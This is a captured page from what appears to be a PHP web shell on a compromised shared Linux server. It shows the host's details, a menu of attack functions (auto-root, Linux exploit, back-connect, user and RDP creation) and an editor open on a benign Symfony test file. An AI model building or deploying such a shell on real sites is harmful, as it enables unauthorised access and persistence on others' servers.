Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
wp /
vendor /
symfony /
process /
Tests /
[ HOME SHELL ]
Name
Size
Permission
Action
ErrorProcessInitiator.php
926
B
-rwxr-xr-x
ExecutableFinderTest.php
4.61
KB
-rw-r--r--
NonStopableProcess.php
1.04
KB
-rw-r--r--
PhpExecutableFinderTest.php
2.13
KB
-rw-r--r--
PhpProcessTest.php
1.28
KB
-rw-r--r--
PipeStdinInStdoutStdErrStreamS...
1.71
KB
-rw-r--r--
ProcessBuilderTest.php
6.65
KB
-rw-r--r--
ProcessFailedExceptionTest.php
4.52
KB
-rw-r--r--
ProcessTest.php
48.27
KB
-rw-r--r--
ProcessUtilsTest.php
1.39
KB
-rw-r--r--
SignalListener.php
399
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : PipeStdinInStdoutStdErrStreamSelect.php
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ define('ERR_SELECT_FAILED', 1); define('ERR_TIMEOUT', 2); define('ERR_READ_FAILED', 3); define('ERR_WRITE_FAILED', 4); $read = [\STDIN]; $write = [\STDOUT, \STDERR]; stream_set_blocking(\STDIN, 0); stream_set_blocking(\STDOUT, 0); stream_set_blocking(\STDERR, 0); $out = $err = ''; while ($read || $write) { $r = $read; $w = $write; $e = null; $n = stream_select($r, $w, $e, 5); if (false === $n) { exit(ERR_SELECT_FAILED); } elseif ($n < 1) { exit(ERR_TIMEOUT); } if (in_array(\STDOUT, $w) && strlen($out) > 0) { $written = fwrite(\STDOUT, (string) $out, 32768); if (false === $written) { exit(ERR_WRITE_FAILED); } $out = (string) substr($out, $written); } if (null === $read && '' === $out) { $write = array_diff($write, [\STDOUT]); } if (in_array(\STDERR, $w) && strlen($err) > 0) { $written = fwrite(\STDERR, (string) $err, 32768); if (false === $written) { exit(ERR_WRITE_FAILED); } $err = (string) substr($err, $written); } if (null === $read && '' === $err) { $write = array_diff($write, [\STDERR]); } if ($r) { $str = fread(\STDIN, 32768); if (false !== $str) { $out .= $str; $err .= $str; } if (false === $str || feof(\STDIN)) { $read = null; if (!feof(\STDIN)) { exit(ERR_READ_FAILED); } } } }
Close